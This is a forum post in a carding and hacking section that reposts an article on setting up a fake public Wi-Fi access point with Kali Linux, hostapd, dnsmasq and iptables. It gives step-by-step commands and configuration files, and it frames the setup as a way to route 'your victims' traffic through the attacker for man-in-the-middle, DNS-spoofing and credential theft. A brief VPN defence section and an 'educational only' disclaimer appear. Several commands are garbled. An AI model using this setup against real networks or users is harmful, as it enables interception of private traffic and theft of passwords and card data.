Home
Forums
New posts
Search forums
What's new
New posts
New profile posts
Latest activity
Members
Current visitors
New profile posts
Search profile posts
Log in
Register
What's new
Search
Search
Search titles only
By:
New posts
Search forums
Menu
Log in
Register
Install the app
Install
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Reply to thread
Home
Forums
CARDING & HACKING
Anonimity & Security
Creating a fake access point
Message
<blockquote data-quote="Prime" data-source="post: 236" data-attributes="member: 18"><p>Using an encrypted tunnel provided by a VPN helps protect all traffic between your device and the VPN server.</p><p></p><p>Think carefully before connecting to a free public wireless hotspot in a cafeteria, airport, or hotel. Have you ever wondered if the public Wi-Fi you're connecting to is secure? This may be a fake access point created by a fraudster.</p><p></p><p>After installing a fake access point and connecting to the victim's device, the attacker launches a man-in-the-middle (MITM) attack to intercept data between the victim's device and the fake access point in order to carry out further malicious and malicious actions.</p><p></p><p>Unfortunately, this is not fiction. This scenario is easily implemented in real life. A man-in-the-middle attack on a Wi-Fi network occurs when the main data transfer route between the victim's device and the Internet passes through the attacking device.</p><p></p><p>After a successful man-in-the-middle attack, the attacker will get into the hands of confidential information of victims, such as email, accounts, password, credit card number, and other important information that is not protected by security protocols. A cybercriminal can easily access sensitive data using Ethercap, Dsn, Mailsnarf, Urlsnarf, Wireshark, Cain and Able, and other tools.</p><p></p><p>Cybercriminals can also use fake wireless access points to collect your information. To do this, they create an access point in a public place with the approximate name "Free Public WiFi", which unsuspecting users consider real. You connect to a Wi-Fi network, while attackers track/steal your data.</p><p>See how this attack can be carried out using just one laptop running Kali Linux. The peculiarity of the attack is that the criminal and the victim are very close, almost side by side, in the range of the Wi-Fi signal.</p><p></p><p>The following example is intended for educational purposes ONLY. Under no circumstances should you use it for illegal activities.</p><p></p><p><strong>Step 1.</strong> Before creating a fake access point using Kali Linux, run the command "<strong>sudo apt-get update</strong>". This command updates the list of all packages to update, both old packages that need updating and new ones that are stored.</p><p></p><p><img src="https://www.securitylab.ru/_article_images/2021/03/30/image001.jpg" alt="image001.jpg" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p></p><p><strong>Step 2. </strong>You must have access to install <strong>hostapd</strong> and <strong>dnsmasq</strong>. Dnsmasq is a small DNS / DHCP server that we will use in this setup.</p><p></p><p><img src="https://www.securitylab.ru/_article_images/2021/03/30/image002.jpg" alt="image002.jpg" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p></p><p>Before you start installing <strong>hostapd</strong>, you should check the wireless connection using the "<strong>iwconfig</strong>" command.</p><p></p><p><img src="https://www.securitylab.ru/_article_images/2021/03/30/image003.jpg" alt="image003.jpg" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p></p><p>From the above command output, you can see that <strong>wlan0</strong> is the name of our wireless interface.</p><p></p><p><strong>Step 3.</strong> Now you need to put this wireless interface into monitoring mode by entering the following commands:</p><p>Code:</p><p>ifconfig wlan0 down</p><p>iwconfig wlan0 mode monitor</p><p>ifconfig wlan0 up</p><p></p><p><img src="https://www.securitylab.ru/_article_images/2021/03/30/image004.jpg" alt="image004.jpg" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p></p><p><strong>Step 4.</strong> To run Hostapd, we need to create a configuration file for this tool, which will contain all the information about the SSID, passphrase, channel number, etc.</p><p></p><p>Just create a directory in / root using "<strong>mkdir / root / accesspoint</strong>” to save all the necessary files for this installation.</p><p></p><p><img src="https://www.securitylab.ru/_article_images/2021/03/30/image005.jpg" alt="image005.jpg" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p></p><p><strong>Step 5.</strong> Now create a hostapd configuration file (hostapd.conf) in the / root / accesspoint directory and write the following information in it:</p><p>Code:</p><p>interface=wlan0</p><p>driver=nl80211</p><p>ssid=Το όνομα που θέλετε (π.χ. Free WiFi)</p><p>hw_mode=g</p><p>channel=11</p><p>macaddr_acl=0</p><p>ignore_broadcast_ssid=0</p><p>auth_algs=1</p><p>wpa=2</p><p>wpa_passphrase=iguru123</p><p></p><p>wpa_key_mgmt=WPA-PSK</p><p>wpa_pairwise=CCMP</p><p>wpa_group_rekey=86400</p><p>ieee80211n=1</p><p>wme_enabled=1</p><p></p><p><img src="https://www.securitylab.ru/_article_images/2021/03/30/image006.jpg" alt="image006.jpg" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p></p><p>Here we'll see what it all means:</p><p>interface = A wireless interface (connection) for hosting an access point, for example. <strong>wlan0</strong></p><p>driver = <strong>Nl80211</strong> is the new public 802.11 network interface, which is now being replaced by cfg80211</p><p>ssid = Wireless network name</p><p>hw_mode = Sets how the interface and allowed channels work. (Usually a, B, and g are used)</p><p>channel = Sets the channel for hostapd to work on. (From 1 to 13)</p><p>macaddr_acl = Used for Mac filtering (0 - disabled, 1 - enabled)</p><p>ign_broadcast_ssid = Used to create hidden access points</p><p>auth_algs = Sets the authentication algorithm (0 for public access, 1 for public access)</p><p>wpa_passphrase = Contains your wireless password</p><p></p><p><strong>Step 6</strong> . Simply launch the access point with the following command:</p><p>Code:</p><p>hostapd hostapd.conf</p><p></p><p><img src="https://www.securitylab.ru/_article_images/2021/03/30/image007.jpg" alt="image007.jpg" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p></p><p>As you can see, your hostapd is working successfully with wlan0: <strong>AP-ENABLED</strong> and a new hwaddr that is randomly assigned <strong>“90:f6:52:e3:2e:c2"</strong>, as well as the ssid you set.</p><p></p><p><strong>Step 7.</strong> Now you need to configure network routing using the dnsmasq tool so that you can switch traffic between network nodes, and there is also a path for sending data.</p><p></p><p>Create a configuration file in the root directory named <strong>dnsmasq.conf</strong> and write the following instructions:</p><p>Code:</p><p>interface=wlan0</p><p>dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h</p><p>dhcp-option=3,192.168.1.1</p><p>dhcp-option=6,192.168.1.1</p><p>server=8.8.8.8</p><p>log-queries</p><p>log-dhcp</p><p>listen-address=127.0 .0.1</p><p></p><p><img src="https://www.securitylab.ru/_article_images/2021/03/30/image008.jpg" alt="image008.jpg" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p></p><p><strong>Step 8</strong>. Assign the network gateway and network mask wlan0 to the interface and add the routing table as shown below:</p><p>Code:</p><p>ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0</p><p>route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1</p><p></p><p>Then you need to start the dnsmasq service with the configuration file that we created in the previous step:</p><p>Code:</p><p>dnsmasq -C dnsmasq.conf -d</p><p></p><p>A webserver designed to provide domain names and related services for smallTFTPandDHCP,DNS-lightweight and fast-configuringDnsmasq Dnsmasq is great for the limited resources of routers and firewalls. Dnsmasq can also be configured to cache DNS queries to improve the speed of DNS lookups on sites that they have already visited.</p><p><img src="https://www.securitylab.ru/_article_images/2021/03/30/image009.jpg" alt="image009.jpg" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p><strong>Step 9</strong>. Before you grant Internet access to your victims, make sure that you have configured iptables, only then can you collect data and perform various further attacks, such as Man-in-the-Middle (MITM), DNS spoofing, ARP spoofing, etc.</p><p></p><p>Code:</p><p>iptables –table nat –append POSTROUTING -out-interface eth0 -j MASQUERADE</p><p>iptables –append FORWARD –in-interface wlan0 -j ACCEPT</p><p></p><p><img src="https://www.securitylab.ru/_article_images/2021/03/30/image010.jpg" alt="image010.jpg" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p></p><p><strong>Step 10</strong> . The last step. Enable the IP forwarding process by typing "<strong>echo 1> / proc / sys / net / ipv4 / ip_forward</strong>".</p><p><img src="https://www.securitylab.ru/_article_images/2021/03/30/image011.jpg" alt="image011.jpg" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p>The fake access point will provide its victim with an Internet connection via an Ethernet network card, thereby ensuring that the device is connected to the fake access point. All victim traffic will now pass through the fake access point.</p><p></p><p><img src="https://www.securitylab.ru/_article_images/2021/03/30/image012.jpg" alt="image012.jpg" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p></p><p><strong>Protection against fake access points</strong></p><p>There are not many ways to protect against such attacks. At first glance, it seems that the problem can be solved by using wireless encryption for protection. However, it is not effective in this case, because WPA does not encrypt user data when the victim is already connected to the access point.</p><p>The author of the article recommends using a virtual private network (VPN) for protection. Using an encrypted tunnel provided by a VPN helps protect all traffic between your device and the VPN server.</p><p></p><h4>About the author: Anastasia Vasileiadis</h4><p>PC specialist, penetration tester, ethical hacker, cybersecurity expert, malware analyst, information security researcher, reverse engineering specialist.</p><p></p><p>(c) <a href="https://www.securitylab.ru/analytics/538719.php" target="_blank">https://www.securitylab.ru/analytics/538719.php</a></p></blockquote><p></p>
[QUOTE="Prime, post: 236, member: 18"] Using an encrypted tunnel provided by a VPN helps protect all traffic between your device and the VPN server. Think carefully before connecting to a free public wireless hotspot in a cafeteria, airport, or hotel. Have you ever wondered if the public Wi-Fi you're connecting to is secure? This may be a fake access point created by a fraudster. After installing a fake access point and connecting to the victim's device, the attacker launches a man-in-the-middle (MITM) attack to intercept data between the victim's device and the fake access point in order to carry out further malicious and malicious actions. Unfortunately, this is not fiction. This scenario is easily implemented in real life. A man-in-the-middle attack on a Wi-Fi network occurs when the main data transfer route between the victim's device and the Internet passes through the attacking device. After a successful man-in-the-middle attack, the attacker will get into the hands of confidential information of victims, such as email, accounts, password, credit card number, and other important information that is not protected by security protocols. A cybercriminal can easily access sensitive data using Ethercap, Dsn, Mailsnarf, Urlsnarf, Wireshark, Cain and Able, and other tools. Cybercriminals can also use fake wireless access points to collect your information. To do this, they create an access point in a public place with the approximate name "Free Public WiFi", which unsuspecting users consider real. You connect to a Wi-Fi network, while attackers track/steal your data. See how this attack can be carried out using just one laptop running Kali Linux. The peculiarity of the attack is that the criminal and the victim are very close, almost side by side, in the range of the Wi-Fi signal. The following example is intended for educational purposes ONLY. Under no circumstances should you use it for illegal activities. [B]Step 1.[/B] Before creating a fake access point using Kali Linux, run the command "[B]sudo apt-get update[/B]". This command updates the list of all packages to update, both old packages that need updating and new ones that are stored. [IMG alt="image001.jpg"]https://www.securitylab.ru/_article_images/2021/03/30/image001.jpg[/IMG] [B]Step 2. [/B]You must have access to install [B]hostapd[/B] and [B]dnsmasq[/B]. Dnsmasq is a small DNS / DHCP server that we will use in this setup. [IMG alt="image002.jpg"]https://www.securitylab.ru/_article_images/2021/03/30/image002.jpg[/IMG] Before you start installing [B]hostapd[/B], you should check the wireless connection using the "[B]iwconfig[/B]" command. [IMG alt="image003.jpg"]https://www.securitylab.ru/_article_images/2021/03/30/image003.jpg[/IMG] From the above command output, you can see that [B]wlan0[/B] is the name of our wireless interface. [B]Step 3.[/B] Now you need to put this wireless interface into monitoring mode by entering the following commands: Code: ifconfig wlan0 down iwconfig wlan0 mode monitor ifconfig wlan0 up [IMG alt="image004.jpg"]https://www.securitylab.ru/_article_images/2021/03/30/image004.jpg[/IMG] [B]Step 4.[/B] To run Hostapd, we need to create a configuration file for this tool, which will contain all the information about the SSID, passphrase, channel number, etc. Just create a directory in / root using "[B]mkdir / root / accesspoint[/B]” to save all the necessary files for this installation. [IMG alt="image005.jpg"]https://www.securitylab.ru/_article_images/2021/03/30/image005.jpg[/IMG] [B]Step 5.[/B] Now create a hostapd configuration file (hostapd.conf) in the / root / accesspoint directory and write the following information in it: Code: interface=wlan0 driver=nl80211 ssid=Το όνομα που θέλετε (π.χ. Free WiFi) hw_mode=g channel=11 macaddr_acl=0 ignore_broadcast_ssid=0 auth_algs=1 wpa=2 wpa_passphrase=iguru123 wpa_key_mgmt=WPA-PSK wpa_pairwise=CCMP wpa_group_rekey=86400 ieee80211n=1 wme_enabled=1 [IMG alt="image006.jpg"]https://www.securitylab.ru/_article_images/2021/03/30/image006.jpg[/IMG] Here we'll see what it all means: interface = A wireless interface (connection) for hosting an access point, for example. [B]wlan0[/B] driver = [B]Nl80211[/B] is the new public 802.11 network interface, which is now being replaced by cfg80211 ssid = Wireless network name hw_mode = Sets how the interface and allowed channels work. (Usually a, B, and g are used) channel = Sets the channel for hostapd to work on. (From 1 to 13) macaddr_acl = Used for Mac filtering (0 - disabled, 1 - enabled) ign_broadcast_ssid = Used to create hidden access points auth_algs = Sets the authentication algorithm (0 for public access, 1 for public access) wpa_passphrase = Contains your wireless password [B]Step 6[/B] . Simply launch the access point with the following command: Code: hostapd hostapd.conf [IMG alt="image007.jpg"]https://www.securitylab.ru/_article_images/2021/03/30/image007.jpg[/IMG] As you can see, your hostapd is working successfully with wlan0: [B]AP-ENABLED[/B] and a new hwaddr that is randomly assigned [B]“90:f6:52:e3:2e:c2"[/B], as well as the ssid you set. [B]Step 7.[/B] Now you need to configure network routing using the dnsmasq tool so that you can switch traffic between network nodes, and there is also a path for sending data. Create a configuration file in the root directory named [B]dnsmasq.conf[/B] and write the following instructions: Code: interface=wlan0 dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h dhcp-option=3,192.168.1.1 dhcp-option=6,192.168.1.1 server=8.8.8.8 log-queries log-dhcp listen-address=127.0 .0.1 [IMG alt="image008.jpg"]https://www.securitylab.ru/_article_images/2021/03/30/image008.jpg[/IMG] [B]Step 8[/B]. Assign the network gateway and network mask wlan0 to the interface and add the routing table as shown below: Code: ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0 route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1 Then you need to start the dnsmasq service with the configuration file that we created in the previous step: Code: dnsmasq -C dnsmasq.conf -d A webserver designed to provide domain names and related services for smallTFTPandDHCP,DNS-lightweight and fast-configuringDnsmasq Dnsmasq is great for the limited resources of routers and firewalls. Dnsmasq can also be configured to cache DNS queries to improve the speed of DNS lookups on sites that they have already visited. [IMG alt="image009.jpg"]https://www.securitylab.ru/_article_images/2021/03/30/image009.jpg[/IMG] [B]Step 9[/B]. Before you grant Internet access to your victims, make sure that you have configured iptables, only then can you collect data and perform various further attacks, such as Man-in-the-Middle (MITM), DNS spoofing, ARP spoofing, etc. Code: iptables –table nat –append POSTROUTING -out-interface eth0 -j MASQUERADE iptables –append FORWARD –in-interface wlan0 -j ACCEPT [IMG alt="image010.jpg"]https://www.securitylab.ru/_article_images/2021/03/30/image010.jpg[/IMG] [B]Step 10[/B] . The last step. Enable the IP forwarding process by typing "[B]echo 1> / proc / sys / net / ipv4 / ip_forward[/B]". [IMG alt="image011.jpg"]https://www.securitylab.ru/_article_images/2021/03/30/image011.jpg[/IMG] The fake access point will provide its victim with an Internet connection via an Ethernet network card, thereby ensuring that the device is connected to the fake access point. All victim traffic will now pass through the fake access point. [IMG alt="image012.jpg"]https://www.securitylab.ru/_article_images/2021/03/30/image012.jpg[/IMG] [B]Protection against fake access points[/B] There are not many ways to protect against such attacks. At first glance, it seems that the problem can be solved by using wireless encryption for protection. However, it is not effective in this case, because WPA does not encrypt user data when the victim is already connected to the access point. The author of the article recommends using a virtual private network (VPN) for protection. Using an encrypted tunnel provided by a VPN helps protect all traffic between your device and the VPN server. [HEADING=3]About the author: Anastasia Vasileiadis[/HEADING] PC specialist, penetration tester, ethical hacker, cybersecurity expert, malware analyst, information security researcher, reverse engineering specialist. (c) [URL]https://www.securitylab.ru/analytics/538719.php[/URL] [/QUOTE]
Name
Verification
Post reply
Home
Forums
CARDING & HACKING
Anonimity & Security
Creating a fake access point
Top